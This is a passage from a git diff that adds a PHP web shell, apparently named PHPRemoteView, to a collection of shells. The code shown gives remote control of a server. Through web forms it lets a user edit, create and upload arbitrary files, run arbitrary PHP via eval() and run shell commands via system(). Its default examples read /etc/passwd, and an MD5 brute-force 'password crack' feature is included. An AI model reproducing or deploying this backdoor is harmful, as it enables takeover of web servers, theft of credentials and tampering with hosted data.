edit!)")."</b></font>)"; + else fclose($fi); + if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)"; + else fclose($fi); + if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)"; + echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>"; + + if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied").""); + echo "<form action=$self method=post> + <input type=hidden name=c value=e_submit> + <input type=hidden name=d value=\"".htmlspecialchars($d)."\"> + <input type=hidden name=f value=\"".htmlspecialchars($f)."\"> + <textarea name=text cols=70 rows=20 style='width: 100%;'>". + htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p> + <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '> + <input type=checkbox name=confirm value=1 id=conf> + <label for=conf><font color=red><b><= confirm</b></font></label> + </form>"; + + break; + + +case "e_submit": + + if (!$write_access) exitw(); + + if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found"); + if (!isset($text)) exit("err# e_submit 1"); + if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)"); + if (!$fi=@fopen($d.$f,"w+")) exit("access denied"); + fwrite($fi,$text); + fclose($fi); + Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f)); + echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>"; + + break; + + + +case "newfile_submit": + + if (!$write_access) exitw(); + + if (!isset($text) || !isset($df)) exit("err# newfile_submit 1"); + if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)"); + if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]"); + fwrite($fi,$text); + fclose($fi); + Header("Location: $self?c=l&d=".urlencode(dirname($df))); + echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>"; + break; + + +case "fileupload_submit": + + if (!$write_access) exitw(); + if (!isset($df)) exit("err# newfile_submit 1"); + if (!isset($df3)) exit("err# newfile_submit 2"); + + $fname=""; + if (isset($df2)) { + if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) { + exit("Upload failed: can't detect file name"); + } + $fname=$ok[1]; + } + else { + $fname=$df3; + } + if ($fname=="") + exit("".mm("You mast checked 'create file name automatic' OR typed file name!").""); + if (isset($df4)) $fname=strtolower($fname); + + echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>"; + echo "Origin file name: ".$HTTP_POST_FILES['userfile']['name']."<br>"; + echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>"; + if ($df[strlen($df)-1]!="/") $df.="/"; + echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>"; + + ob(); + $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname"); + obb(); + if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb"); + + if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df); + Header("Location: $ref"); + echo "<a href='$ref'>NEW FILE SAVED</a>"; + + break; + + +case "newdir_submit": + + if (!$write_access) exitw(); + if (!isset($df)) exit("err# newdir_submit 1"); + ob(); + if (!mkdir($df,$mkdir_mode)) { + obb(); + exit("Access denied $obb"); + } + obb(); + if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df); + Header("Location: $ref"); + echo "<a href='$ref'>Go to new directory!</a>"; + + break; + + +case "t": + + echo "<h3> + <a href='$self'>START PAGE</a> | + <a href='$self?c=t'>Eval/Shell</a> | + <a href='$self?c=codes'>Character map</a> + </h3>"; + + + if (!$write_access) exitw(); + error_reporting(2038); + + if (!isset($php)) { + $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */"; + $skipphp=1; + $pre='checked'; + $nlbr=''; + $xmp=''; + $htmls='checked'; + } + + echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\") +<form action=$self method=post> +<input type=hidden name=c value=t> +<textarea name=php rows=".(!isset($skipphp)?10:4)." cols=60 style='width:100%;'>$php</textarea> +<input type=checkbox name=pre value='checked' $pre id='pre'> + <label for='pre'> add &lt;pre&gt;</label> &nbsp; +<input type=checkbox name=xmp value='checked' $xmp id='xmp'> + <label for='xmp'> add &lt;xmp&gt;</label> &nbsp; +<input type=checkbox name=htmls value='checked' $htmls id='htmls'> + <label for='htmls'> add htmlspecialchars()</label> &nbsp; +<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'> + <label for='nlbr'> add nl2br()</label><br> +<input type=submit></form> +<P>"; + + if (!isset($shell)) $skipshell=1; + + if (!isset($skipphp)) { + echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; + if ($pre<>'') echo "<pre>"; + if ($xmp<>'') echo "<xmp>"; + if ($nlbr<>'' || $htmls<>'') { + ob_start(); + } + if ($phpeval_access) eval($php); + else die("Sorry, function eval() disabled."); + if ($nlbr<>'' || $htmls<>'') { + $tmp=ob_get_contents(); + ob_end_clean(); + if ($htmls<>'') $tmp=htmlspecialchars($tmp); + if ($nlbr<>'') $tmp=nl2br($tmp); + echo $tmp; + } + if ($xmp<>'') echo "</xmp>"; + if ($pre<>'') echo "</pre>"; + echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; + echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>"; + } + + if (!isset($shell)) { + $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a"; + $skipshell=1; + } + echo "<P><b>".mm("Shell commands")."</b> +<form action=$self method=post> +<input type=hidden name=c value=t> +<textarea name=shell rows=".(!isset($skipshell)?10:4)." cols=60 style='width:100%;'>$shell</textarea><br> +<input type=submit></form> +<P>"; + if (!isset($skipshell)) { + echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>"; + if ($system_access) system($shell); + else die("Sorry, function system() disabled."); + echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>"; + } + + + $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>", + 2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes", + 5=>"Decode Base64<br>", + 6=>"UnixTime=>Date(".time().")", + 8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>", + 9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>", + 10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251", + 15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r", + ); + echo "<P><b>".mm("Universal convert")."</b>"; + + echo "<a name=convert></a><form action='$self#convert' method=post>"; + foreach ($ttype as $k=>$v) + echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> "; + + echo " +<input type=hidden name=c value=t> +<textarea name=convert rows=".(isset($convert)?10:3)." cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br> +<input type=submit><br>"; + + + $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b"; + $russtr2="ةضستإحأاصعشغآہدذخثؤفرجبزـءéَِêهيمçُْôûâàïًîëن‎ٌىèٍüل"; + function from_translit($ss) { + global $russtr1,$russtr2; + $w=array("Sch",'ظ',"SCH",'ظ',"ScH",'ظ',"SCh",'ظ',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸', + "Zh",'ئ',"ZH",'ئ',"zh",'و',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'ط',"SH",'ط',"sh",'ّ', + "##",'ع',"''",'ـ',"Eh",'ف',"EH",'ف',"eh",'‎',"Ju",'ق',"JU",'ق',"ju",'‏',"Yu",'ق', + "YU",'ق',"yu",'‏',"YA","ك","Ya","ك","ya","ے","Ja",'ك',"JA",'ك',"ja",'ے'); + $c=count($w); + for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss); + $ss=strtr($ss,$russtr1,$russtr2); + $ss=preg_replace("!([à-ے]+)~([à-ے]+)!is","\\1\\2",$ss); + return $ss; + } + function to_translit($ss) { + global $russtr1,$russtr2; + $ss=strtr($ss,$russtr2,$russtr1); + $ss=str_replace( + array('ط', 'ظ', 'ئ', 'ك', '×', 'ق', '¨', 'ّ', 'ù', 'و', 'ے', '÷', '‏', '¸', ), + array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',), + $ss); + return $ss; + } + + if (isset($convert)) { + if (!isset($name)) $name="0"; + $out=""; + switch ($name) { + + case 1: + $out=md5($convert); + break; + + case 2: + $out=base64_encode($convert); + break; + + case 3: + $out=chunk_split(base64_encode($convert)); + break; + + case 4: + $out=base64_encode($convert); + $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2); + break; + + case 5: + $out=base64_decode($convert); + break; + + case 6: + $convert=intval($convert); + if ($convert==0) $convert=time(); + $out="Unixtime=$convert\n---Day/Month/Year--\n". + date("d/m/Y H:i:s",$convert)."\n". + date("d-m-Y H:i:s",$convert)."\n". + date("d.m.Y H:i:s",$convert)."\n". + "---Month/Day/Year--\n". + date("m/d/Y H:i:s",$convert)."\n". + date("m-d-Y H:i:s",$convert)."\n". + date("m.d.Y H:i:s",$convert)."\n". + "---------SQL-------\n". + date("Y-m-d H:i:s",$convert)."\n". + date("Y m d H i s",$convert)."\n". + date("YmdHis",$convert); + break; + + case 8: + $c=explode(" ",trim(preg_replace("! +!"," ",$convert))); + if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59"; + else { + if (empty($c[0])) $c[0]=1970; + if ($c[0]<50) $c[0]=2000+$c[0]; + if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0]; + if (empty($c[1])) $c[1]=1; + if (empty($c[2])) $c[2]=1; + if (empty($c[3])) $c[3]=0; + if (empty($c[4])) $c[4]=0; + if (empty($c[5])) $c[5]=0; + $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]); + } + break; + + case 9: + $out=from_translit($convert); + break; + + case 14: + $out=to_translit($convert); + break; + + case 10: $out=convert_cyr_string($convert,'w','k'); break; + case 11: $out=convert_cyr_string($convert,'k','w'); break; + case 12: $out=convert_cyr_string($convert,'w','m'); break; + case 13: $out=convert_cyr_string($convert,'m','w'); break; + case 15: $out=convert_cyr_string($convert,'k','m'); break; + case 16: $out=convert_cyr_string($convert,'m','k'); break; + + case 7: + echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>"; + break; + + case 0: + $out="Please select anythink function in list. Example: type 'test' and select 'md5'. Then click 'Submit'."; + break; + + default: + $out='Sorry, this function not work (try new versions)'; + } + echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>"; + } + + break; + + +case "md5crack": + + echo "<form action=$self name=main><input type=hidden name=c value=md5crack> + <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>"; + + if (!isset($go)) { + if (!isset($fullqty)) $fullqty=""; + if (!isset($fulltime)) $fulltime=""; + if (!isset($php)) $php=""; + if (!isset($from)) $from=""; + echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)"; + echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>"; + $chars=array( + 'a-z'=>"abcdefghijklmnopqrstuvwxyz", + 'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", + 'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789", + 'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", + 'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\"); + $i=0; + foreach ($chars as $k=>$v) { + echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script> + <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; "; + $i++; + } + echo "<P> + <b>Start from</b>: <input type=text size=70 name=from value='$from'><P> + <input type=hidden name=go value=1> + <input type=hidden name=fullqty value=$fullqty> + <input type=hidden name=fulltime value=$fulltime> + <input type=submit value='Start!'><form>"; + } + else { + + function mdgetword() { + global $php,$from,$word; + $word=""; + for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]]; + } + + $fulltime=@intval($fulltime); + $fullqty=@intval($fullqty); + + $text=strtolower($text); + if (!preg_match("!^[0-9a-f]{32}$!",$text)) exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f"); + if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm"; + if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) { + $pos=0; + $from=0; + } + else { + $pos=$ok[1]; + $from=$ok[2]; + } + $from=explode(",",$from); + if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { + $from=array(0); + if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)"); + } + $phplen=strlen($php); + mdgetword(); + $poslen=strlen($word); + if ($pos<0 || $pos>=$poslen) $pos=0; + + for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); } + + echo "<h3><a href='$self?c=md5crack". + "&from=".urlencode("$pos:".implode(",",$from)). + "&text=".urlencode($text). + "&php=".urlencode($php). + "&fulltime=$fulltime&fullqty=$fullqty". + "'>Save this link</a> - click for break and save current position</h3>"; + flush(); + + echo " + MD5_HASH=$text<br> + CURRENT_WORD=$word<br> + CURRENT_DIGIT=$pos:".implode(",",$from)."<br> + RANGE=".htmlspecialchars($php)."<br> + ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br> + Calculation(qty)={$fullqty}0000<p><font face=courier>"; + flush(); + + + $fullsum=pow($phplen,$poslen); + $time1=time(); + $i=0; + + while (1) { + + $i++; + if ($i>50000) { + $time=time()-$time1; + if ($time>20) break; + $i=0; + $sum=0; + for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j); + printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n", + $sum*100/$fullsum,$time); + flush(); + $fullqty+=5; + } + + if (md5($word)===$text) + exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font> + <script> window.focus(); window.focus(); setTimeout(\"alert('Done!')\",100);</script>"); + $from[$pos]++; + if ($from[$pos]==$phplen) { + $flag=1; + $from[$pos]=0; + $word[$pos]=$php[0]; + for ($pos=$pos+1; $pos<$poslen; $pos++) { + if ($from[$pos]+1<$phplen) { + $from[$pos]++; + $word[$pos]=$php[$from[$pos]]; + $flag=0; + $pos=0; + break; + } + else { + $from[$pos]=0; + $word[$pos]=$php[0]; + } + } + if ($flag) { + $from[]=0; + $poslen=count($from); + $word.=$php[0]; + $pos=0; + $fullsum=pow($phplen,$poslen); + } + } + $word[$pos]=$php[$from[$pos]]; + } + + $fulltime+=time()-$time1; + if ($i>5000) $fullqty++; + $url="$self?c=md5crack". + "&from=".urlencode("$pos:".implode(",",$from)). + "&text=".urlencode($text). + "&php=".urlencode($php). + "&fulltime=$fulltime&fullqty=$fullqty&go=1"; + echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>"; + + } + + break; + + +case "phpinfo": + + phpinfo(); + break; + + +case "codes": + + error_reporting(2039); + if (!isset($limit)) $limit=999; + if (!isset($fontsize)) $fontsize="300%"; + + echo "<h3> + <a href='$self'>START PAGE</a> | + <a href='$self?c=t'>Eval/Shell</a> | + <a href='$self?c=codes'>Character map</a> + </h3>"; + + echo "<h3>".mm("Character map (symbol codes table)")."</h3> + <form action=$self method=get> + <input type=hidden name=c value=\"codes\"> + <select name=fontname size=1> + <option value='Webdings'>====[ ".mm("Select font")." ]===="; + + foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol', + 'System','Tahoma','Terminal','Times New Roman','Verdana', + 'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v) + echo "<option".($fontname==$v?" selected":"").">$v"; + + echo "</select> + ".mm("or type other")." + <input size=13 type=text name=fontname2 value=\"$fontname2\">. + ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br> + ".mm("Code limit").": + <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label> + <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label> + <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label> + <input type=submit value='".mm("Generate table")." !'></form><P>"; + + if (!isset($fontname)) break; + if (!empty($fontname2)) $fontname=$fontname2; + echo " + <STYLE> + .codes { font: $fontsize $fontname; text-align: center; } + .z { font: 12pt Fixedsys; color: #cccccc; } + </STYLE> + <table class=codes border=0 cellspacing=0 cellpadding=1>"; + ?> + <SCRIPT> + m=8; + n=1; + s=new String(""); + s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>"; + for (i=1; i<=<?php echo $limit; ?>; i++) { + if (i<10) x="000"+i; + else if (i<100) x="00"+i; + else if (i<1000) x="0"+i; + else x=i; + if (n%m==0) s=s+"<tr>"; + s=s+"<td class=z>&amp;#"+x+";</td>"; + s=s+"<td>&#"+x+";</td>"; + if (n%m+1==m) s=s+"</tr>"; + if (s.length>500) { + document.write(s); + s="" + } + n++; + } + document.write(s); + </SCRIPT> + <?php + + echo "</table>"; + break; + + + +case "img": + + unset($img); +$img=array( +'dir'=> +'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'. +'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=', +'fon'=> +'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'. +'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'. +'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'. +'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'. +'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'. +'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'. +'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'. +'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'. +'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'. +'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'. +'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'. +'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'. +'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'. +'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7', +'mode'=> +'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'. +'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'. +'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=', + +'refresh'=> +'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'. +'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'. +'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'. +'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=', +'search'=> +'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'. +'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'. +'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'. +'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'. +'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==', +'setup'=> +'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'. +'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'. +'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'. +'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'. +'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==', +'up'=> +'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'. +'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'. +'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==', +'sort_asc'=> +'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'. +'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==', +'sort_desc'=> +'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'. +'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=', +'exe'=> +'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'. +'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'. +'xhIAOw==', +'html'=> +'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'. +'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'. +'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'. +'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'. +'ADs=', +'txt'=> +'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'. +'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'. +'UpPWG3Ig6Hq/XmRjuZwkAAA7', +'unk'=> +'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'. +'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'. +'yUzYbJao6npVkQQAOw==', +'php'=> +'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'. +'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'. +'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'. +'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==', +'img'=> +'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'. +'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'. +'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'. +'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==', +'edit'=> +'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'. +'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'. +'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==', +'papki'=> +'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'. +'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'. +'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==', +'home'=> +'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'. +'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'. +'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=', +'back'=> +'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'. +'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'. +'Wg0JADs=' + +); + + + header("Content-type: image/gif"); + header("Cache-control: public"); + // /* + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + // */ + echo base64_decode($img[$name]); + + break; + +} + + +?> \ No newline at end of file diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg b/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg new file mode 100644 index 0000000..445e54f Binary files /dev/null and 